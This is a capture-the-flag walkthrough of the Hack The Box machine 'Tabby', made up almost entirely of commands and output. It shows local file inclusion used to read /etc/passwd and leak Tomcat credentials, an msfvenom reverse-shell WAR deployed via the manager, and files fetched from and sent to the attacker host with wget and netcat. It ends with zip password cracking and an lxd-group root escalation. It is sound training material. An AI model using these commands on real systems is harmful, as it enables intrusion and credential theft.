--- search: exclude: true --- # Tabby Writeup ![](img/48.png) ## Introduction : Tabby is an easy Linux box released back in June 2020. ## **Part 1 : Initial Enumeration** As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions. [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB] → nmap -vvv -p- 10.10.10.194 --max-retries 0 -Pn --min-rate=500 2>/dev/null | grep Discovered Discovered open port 22/tcp on 10.10.10.194 Discovered open port 8080/tcp on 10.10.10.194 Discovered open port 80/tcp on 10.10.10.194 [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby] → nmap -sCV -p 22,8080,80 10.10.10.194 Starting Nmap 7.91 ( https://nmap.org ) at 2021-06-02 07:52 CEST Nmap scan report for 10.10.10.194 Host is up (0.037s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 3072 45:3c:34:14:35:56:23:95:d6:83:4e:26:de:c6:5b:d9 (RSA) | 256 89:79:3a:9c:88:b0:5c:ce:4b:79:b1:02:23:4b:44:a6 (ECDSA) |_ 256 1e:e7:b9:55:dd:25:8f:72:56:e8:8e:65:d5:19:b0:8d (ED25519) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Mega Hosting 8080/tcp open http Apache Tomcat |_http-title: Apache Tomcat Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.24 seconds ## **Part 2 : Getting User Access** Our nmap scan picked up port 80: ![](prg/48_001.png) So here we found a domain name and a hyperlink leading to **megahosting.htb** so let's add it to our hosts file: [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby] → sudo -i [sudo] password for nothing: ┌──(root💀nowhere)-[~] └─# echo '10.10.10.194 megahosting.htb' >> /etc/hosts ┌──(root💀nowhere)-[~] └─# exit And when we click the hyperlink to the data breach we get the following: ![](prg/48_002.png) Here we see that this is a php file with the **file** parameter and let's try to see if there is any LFI by trying to read system files such as **/etc/passwd** : [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby] → curl http://megahosting.htb/news.php\?file\=../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false sshd:x:111:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false tomcat:x:997:997::/opt/tomcat:/bin/false mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false **ash:x:1000:1000:clive:/home/ash:/bin/bash** Here we see that the **file** php arguement is vulnerable to LFI, and we now know that **ash** is a valid user on this box. Now let's move over to port 8080 with tomcat: ![](prg/48_003.png) Here we have a tomcat9 instance, let's scan for hidden directories there with ffuf: [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby] → ffuf -u http://10.10.10.194:8080/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -t 50 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.3.1 Kali Exclusive ________________________________________________ :: Method : GET :: URL : http://10.10.10.194:8080/FUZZ :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 50 :: Matcher : Response status: 200,204,301,302,307,401 ________________________________________________ docs [Status: 302, Size: 0, Words: 1, Lines: 1] examples [Status: 302, Size: 0, Words: 1, Lines: 1] host-manager [Status: 302, Size: 0, Words: 1, Lines: 1] index.html [Status: 200, Size: 1895, Words: 201, Lines: 30] **manager [Status: 302, Size: 0, Words: 1, Lines: 1]** :: Progress: [4686/4686] :: Job [1/1] :: 1211 req/sec :: Duration: [0:00:04] :: Errors: 0 :: And here we found the manager page with the 302 status code, so we need to authenticate there: ![](prg/48_004.png) Now obviously putting in admin/admin doesn't get us in, however when we close it to get the 401 Unauthorized error code we get something interesting: ![](prg/48_005.png) Here we see the original credentials **tomcat:s3cret** , however they got changed obviously, so instead we shift our attention to the fact that the credentials are stored in the **conf/tomcat-users.xml** file, so let's use the LFI to get it: [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby] → curl http://megahosting.htb/news.php\?file\=../../../../usr/share/tomcat9/conf/tomcat-users.xml [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby] → curl http://megahosting.htb/news.php\?file\=../../../../usr/share/tomcat9/etc/tomcat-users.xml <****?xml version="1.0" encoding="UTF-8"?> <****!-- Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. --> <****tomcat-users xmlns="http://tomcat.apache.org/xml" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://tomcat.apache.org/xml tomcat-users.xsd" version="1.0"> <****!-- NOTE: By default, no user is included in the "manager-gui" role required to operate the "/manager/html" web application. If you wish to use this app, you must define such a user - the username and password are arbitrary. It is strongly recommended that you do NOT use one of the users in the commented out section below since they are intended for use with the examples web application. --> <****!-- NOTE: The sample user and role entries below are intended for use with the examples web application. They are wrapped in a comment and thus are ignored when reading this file. If you wish to configure these users for use with the examples web application, do not forget to remove the that surrounds them. You will also need to set the passwords to something appropriate. --> <****!-- <****role rolename="tomcat"/> <****role rolename="role1"/> <****user username="tomcat" password=" <****must-be-changed>" roles="tomcat"/> <****user username="both" password=" <****must-be-changed>" roles="tomcat,role1"/> <****user username="role1" password=" <****must-be-changed>" roles="role1"/> --> <****role rolename="admin-gui"/> <****role rolename="manager-script"/> <****user**username="tomcat" password="$3cureP4s5w0rd123!"** roles="admin-gui,manager-script"/> <****/tomcat-users> And here we found credentials for tomcat: **tomcat:$3cureP4s5w0rd123!** [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby] → ffuf -u http://10.10.10.194:8080/manager/FUZZ -w /usr/share/seclists/Discovery/Web-Content/common.txt -mc 200,204,301,302,307,401 -t 50 /'___\ /'___\ /'___\ /\ \__/ /\ \__/ __ __ /\ \__/ \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\ \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/ \ \_\ \ \_\ \ \____/ \ \_\ \/_/ \/_/ \/___/ \/_/ v1.3.1 Kali Exclusive ________________________________________________ :: Method : GET :: URL : http://10.10.10.194:8080/manager/FUZZ :: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/common.txt :: Follow redirects : false :: Calibration : false :: Timeout : 10 :: Threads : 50 :: Matcher : Response status: 200,204,301,302,307,401 ________________________________________________ html [Status: 401, Size: 2499, Words: 457, Lines: 64] images [Status: 302, Size: 0, Words: 1, Lines: 1] status [Status: 401, Size: 2499, Words: 457, Lines: 64] **text [Status: 401, Size: 2499, Words: 457, Lines: 64]** Here we get the /manager/text URI and if we lookup the tomcat documentation, this is where the sysadmin can execute commands, so let's investigate it, and we can do that from curl: [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby] → curl -u tomcat:\$3cureP4s5w0rd123! http://10.10.10.194:8080/manager/text/list OK - Listed applications for virtual host [localhost] /:running:0:ROOT /examples:running:0:/usr/share/tomcat9-examples/examples /host-manager:running:0:/usr/share/tomcat9-admin/host-manager /manager:running:0:/usr/share/tomcat9-admin/manager /docs:running:0:/usr/share/tomcat9-docs/docs So from here, just like for the [Kotarak](../Hard/7.md) box, we can upload a malicious WAR file to get us a shell, we're going to generate it using msfvenom: [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby] → msfvenom -l payloads | grep java\ pipe> [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby] → msfvenom -l payloads | grep java java/jsp_shell_bind_tcp Listen for a connection and spawn a command shell java/jsp_shell_reverse_tcp Connect back to attacker and spawn a command shell java/meterpreter/bind_tcp Run a meterpreter server in Java. Listen for a connection java/meterpreter/reverse_http Run a meterpreter server in Java. Tunnel communication over HTTP java/meterpreter/reverse_https Run a meterpreter server in Java. Tunnel communication over HTTPS java/meterpreter/reverse_tcp Run a meterpreter server in Java. Connect back stager java/shell/bind_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Listen for a connection java/shell/reverse_tcp Spawn a piped command shell (cmd.exe on Windows, /bin/sh everywhere else). Connect back stager java/shell_reverse_tcp Connect back to attacker and spawn a command shell [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby] → msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.13 LPORT=9001 -f war > thanksippsec.war Payload size: 1096 bytes Final size of war file: 1096 bytes [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby] → file thanksippsec.war thanksippsec.war: Zip archive data, at least v2.0 to extract Now that we created our war file, let's upload it and deploy it: [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby] → nc -lvnp 9001 listening on [any] 9001 ... Now the trick here is that unlike on the Kotarak box, here we only have access to the commandline's **/manager/text** so we're going to upload our war file and deploy it through the commandline thanks to curl: [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby] → curl -u tomcat:\$3cureP4s5w0rd123! http://10.10.10.194:8080/manager/text/deploy\?path\=/webshell\&update;\=true -T thanksippsec.war OK - Deployed application at context path [/webshell] [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby] → curl -u tomcat:\$3cureP4s5w0rd123! http://10.10.10.194:8080/webshell/ [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby] → nc -lvnp 9001 listening on [any] 9001 ... connect to [10.10.14.13] from (UNKNOWN) [10.10.10.194] 34800 id uid=997(tomcat) gid=997(tomcat) groups=997(tomcat) And we got a reverse shell connection! We are now able to execute commands as the tomcat user. Let's first upgrade our shell to a fully interactive TTY: # check which commands we can use which python python3 curl wget bash /usr/bin/python3 /usr/bin/curl /usr/bin/wget /usr/bin/bash # spawn a TTY with python3's pty module python3 -c 'import pty; pty.spawn("/bin/bash")' tomcat@tabby:/var/lib/tomcat9$ # CTRL Z to background the reverse shell netcat process tomcat@tabby:/var/lib/tomcat9$ ^Z [1] + 22233 suspended nc -lvnp 9001 # set the stty as raw with the -echo flags, then foreground the process [ 10.10.14.13/23 ] [ /dev/pts/74 ] [~/HTB/Tabby] → stty raw -echo ; fg [1] + 22233 continued nc -lvnp 9001 # export the TERM and SHELL environment variables, and set the TTY right (for nano /vim stuff) export TERM=screen-256color tomcat@tabby:/var/lib/tomcat9$ export SHELL=bash tomcat@tabby:/var/lib/tomcat9$ stty rows 40 columns 200 tomcat@tabby:/var/lib/tomcat9$ reset # and once the terminal has resetted, we are now in a fully interactive reverse shell! tomcat@tabby:/var/lib/tomcat9$ id uid=997(tomcat) gid=997(tomcat) groups=997(tomcat) Now from here we can upload linpeas.sh to enumerate the box: [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby] → locate linpeas.sh /home/nothing/HTB/Admirer/linpeas.sh /home/nothing/HTB/OpenAdmin/linpeas.sh /home/nothing/HTB/Postman/linpeas.sh /home/nothing/HTB/Traverxec/linpeas.sh /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby] → cp /home/nothing/Tools/privilege-escalation-awesome-scripts-suite/linPEAS/linpeas.sh . [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby] → python3 -m http.server 9090 Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ... tomcat@tabby:/var/lib/tomcat9$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas.sh --2021-06-02 08:01:09-- http://10.10.14.13:9090/linpeas.sh Connecting to 10.10.14.13:9090... connected. HTTP request sent, awaiting response... 200 OK Length: 341863 (334K) [text/x-sh] Saving to: ‘/tmp/peas.sh’ /tmp/peas.sh 100%[=============================================================================================================>] 333.85K 699KB/s in 0.5s 2021-06-02 08:01:10 (699 KB/s) - ‘/tmp/peas.sh’ saved [341863/341863] tomcat@tabby:/var/lib/tomcat9$ chmod +x /tmp/peas.sh tomcat@tabby:/var/lib/tomcat9$ /tmp/peas.sh ` ![](prg/48_007.png) Let linpeas.sh run, then as you scroll down you will end up on a certain backup zip file: ![](prg/48_008.png) Coincidentally, it seems that the backup zip file is owned by the ash user, and there seems to be a copy of it in the /tmp folder, let's check if they are the same: tomcat@tabby:/var/lib/tomcat9$ md5sum /var/www/html/files/16162020_backup.zip /tmp/16162020_backup.zip f0a0af346ad4495cfdb01bd5173b0a52 /var/www/html/files/16162020_backup.zip f0a0af346ad4495cfdb01bd5173b0a52 /tmp/16162020_backup.zip And indeed they are the same! let's open it locally and see what it contains, we can use netcat to get the zipfile from the box: tomcat@tabby:/tmp$ md5sum 16162020_backup.zip f0a0af346ad4495cfdb01bd5173b0a52 16162020_backup.zip tomcat@tabby:/var/lib/tomcat9$ which nc /usr/bin/nc tomcat@tabby:/tmp$ cat 16162020_backup.zip | nc 10.10.14.13 9002 [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby] → nc -lvnp 9002 > backup.zip listening on [any] 9002 ... connect to [10.10.14.13] from (UNKNOWN) [10.10.10.194] 57326 [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby] → md5sum backup.zip f0a0af346ad4495cfdb01bd5173b0a52 backup.zip And here we see that the 2 files hashes are identical, this means that we successfully transfered the file back onto our local machine. Let's try to unzip it: [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby] → unzip backup.zip Archive: backup.zip creating: var/www/html/assets/ [backup.zip] var/www/html/favicon.ico password: password incorrect--reenter: password incorrect--reenter: skipping: var/www/html/favicon.ico incorrect password creating: var/www/html/files/ [backup.zip] var/www/html/index.php password: But it's password protected, so let's try to crack it using fcrackzip: [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby] → sudo apt install fcrackzip [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby] → fcrackzip -vuDp /usr/share/wordlists/rockyou.txt backup.zip 'var/www/html/assets/' is not encrypted, skipping found file 'var/www/html/favicon.ico', (size cp/uc 338/ 766, flags 9, chk 7db5) 'var/www/html/files/' is not encrypted, skipping found file 'var/www/html/index.php', (size cp/uc 3255/ 14793, flags 9, chk 5935) found file 'var/www/html/logo.png', (size cp/uc 2906/ 2894, flags 9, chk 5d46) found file 'var/www/html/news.php', (size cp/uc 114/ 123, flags 9, chk 5a7a) found file 'var/www/html/Readme.txt', (size cp/uc 805/ 1574, flags 9, chk 6a8b) checking pw arizon1 PASSWORD FOUND!!!!: pw == admin@it And we found the password! so let's unzip it: [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby] → unzip backup.zip Archive: backup.zip [backup.zip] var/www/html/favicon.ico password: inflating: var/www/html/favicon.ico inflating: var/www/html/index.php extracting: var/www/html/logo.png inflating: var/www/html/news.php inflating: var/www/html/Readme.txt [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby] → tree var var └── www └── html ├── assets ├── favicon.ico ├── files ├── index.php ├── logo.png ├── news.php └── Readme.txt 4 directories, 5 files The files that were contained are preety much irrelevant, the fact of the matter is that this zip file is supposed to be owned by ash, and we got his potential password. Let's try and see if ash re-used the same password on the box: tomcat@tabby:/tmp$ su ash Password: ash@tabby:/tmp$ id uid=1000(ash) gid=1000(ash) groups=1000(ash),4(adm),24(cdrom),30(dip),46(plugdev),116(lxd) ash@tabby:/tmp$ cat ~/user.txt 04XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And that's it! We managed to privesc to the ash user, and got the user flag. ## **Part 3 : Getting Root Access** Now in order to privesc we can run linpeas once again: ash@tabby:/tmp$ wget http://10.10.14.13:9090/linpeas.sh -O /tmp/peas2.sh --2021-06-02 08:19:11-- http://10.10.14.13:9090/linpeas.sh Connecting to 10.10.14.13:9090... connected. HTTP request sent, awaiting response... 200 OK Length: 341863 (334K) [text/x-sh] Saving to: ‘/tmp/peas2.sh’ /tmp/peas2.sh 100%[=============================================================================================================>] 333.85K 689KB/s in 0.5s 2021-06-02 08:19:12 (689 KB/s) - ‘/tmp/peas2.sh’ saved [341863/341863] ash@tabby:/tmp$ chmod +x /tmp/peas2.sh ash@tabby:/tmp$ /tmp/peas2.sh The difference being that now linpeas is going to try and find the possible paths from the ash user: ![](prg/48_009.png) Now here we see that the ash user is part of the lxd group, which can be exploited to get a root shell thanks to a lxd-alpine container: [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby] → git clone https://github.com/saghul/lxd-alpine-builder.git Cloning into 'lxd-alpine-builder'... remote: Enumerating objects: 35, done. remote: Counting objects: 100% (8/8), done. remote: Compressing objects: 100% (8/8), done. remote: Total 35 (delta 2), reused 2 (delta 0), pack-reused 27 Receiving objects: 100% (35/35), 21.69 KiB | 1.20 MiB/s, done. Resolving deltas: 100% (8/8), done. [ 10.10.14.13/23 ] [ /dev/pts/57 ] [~/HTB/Tabby] → cd lxd-alpine-builder [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Tabby/lxd-alpine-builder] → sudo ./build-alpine [...] Executing busybox-initscripts-3.2-r2.post-install (16/20) Installing scanelf (1.2.8-r0) (17/20) Installing musl-utils (1.2.2-r0) (18/20) Installing libc-utils (0.7.2-r3) (19/20) Installing alpine-keys (2.2-r0) (20/20) Installing alpine-base (3.13.5-r0) Executing busybox-1.32.1-r6.trigger OK: 9 MiB in 20 packages Now let's transfer the built tar.gz image onto the box: [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Tabby/lxd-alpine-builder] → ls -lash alpine-v3.13-x86_64-20210602_1002.tar.gz 3.2M -rw-r--r-- 1 root root 3.2M Jun 2 10:02 alpine-v3.13-x86_64-20210602_1002.tar.gz [ 10.10.14.13/23 ] [ /dev/pts/57 ] [HTB/Tabby/lxd-alpine-builder] → python3 -m http.server 9090 Serving HTTP on 0.0.0.0 port 9090 (http://0.0.0.0:9090/) ... ash@tabby:/tmp$ wget http://10.10.14.13:9090/alpine-v3.13-x86_64-20210602_1002.tar.gz --2021-06-02 08:24:46-- http://10.10.14.13:9090/alpine-v3.13-x86_64-20210602_1002.tar.gz Connecting to 10.10.14.13:9090... connected. HTTP request sent, awaiting response... 200 OK Length: 3256211 (3.1M) [application/gzip] Saving to: ‘alpine-v3.13-x86_64-20210602_1002.tar.gz’ alpine-v3.13-x86_64-20210602_1002.tar.gz 100%[=============================================================================================================>] 3.10M 570KB/s in 5.5s 2021-06-02 08:24:51 (582 KB/s) - ‘alpine-v3.13-x86_64-20210602_1002.tar.gz’ saved [3256211/3256211] Say no to all prompts: ash@tabby:/tmp$ lxd init Would you like to use LXD clustering? (yes/no) [default=no]: no Do you want to configure a new storage pool? (yes/no) [default=yes]: no Would you like to connect to a MAAS server? (yes/no) [default=no]: no Would you like to create a new local network bridge? (yes/no) [default=yes]: no Would you like to configure LXD to use an existing bridge or host interface? (yes/no) [default=no]: no Would you like LXD to be available over the network? (yes/no) [default=no]: no Would you like stale cached images to be updated automatically? (yes/no) [default=yes] no Would you like a YAML "lxd init" preseed to be printed? (yes/no) [default=no]: no ash@tabby:/tmp$ mv alpine-v3.13-x86_64-20210602_1002.tar.gz alpine.tar.gz ash@tabby:/tmp$ lxc image import /tmp/alpine.tar.gz --alias alpine ash@tabby:/tmp$ lxc image list +--------+--------------+--------+----------------------------------------+--------------+-----------+--------+------------------------------+ | ALIAS | FINGERPRINT | PUBLIC | DESCRIPTION | ARCHITECTURE | TYPE | SIZE | UPLOAD DATE | +--------+--------------+--------+----------------------------------------+--------------+-----------+--------+------------------------------+ | alpine | 2d59dc1f8e1c | no | Alpinelinux 3.8 x86_64 (20210601_2225) | x86_64 | CONTAINER | 1.92MB | Jun 1, 2021 at 10:54pm (UTC) | +--------+--------------+--------+----------------------------------------+--------------+-----------+--------+------------------------------+ And once your alpine image got imported, we can launch it to get access to the root files on the server: ash@tabby:/tmp$ lxc init alpine mycontainer -c security.privileged=true Creating mycontainer The instance you are starting doesn't have any network attached to it. To create a new network, use: lxc network create To attach a network to an instance, use: lxc network attach ash@tabby:/tmp$ lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true Device mydevice added to mycontainer ash@tabby:/tmp$ lxc start mycontainer ash@tabby:/tmp$ lxc exec mycontainer /bin/sh ~ # id uid=0(root) gid=0(root) ~ # cat /mnt/root/root/root.txt 99XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX And that's it! We managed to get the root flag. ## **Conclusion** Here we can see the progress graph : ![](img/48_graph.png)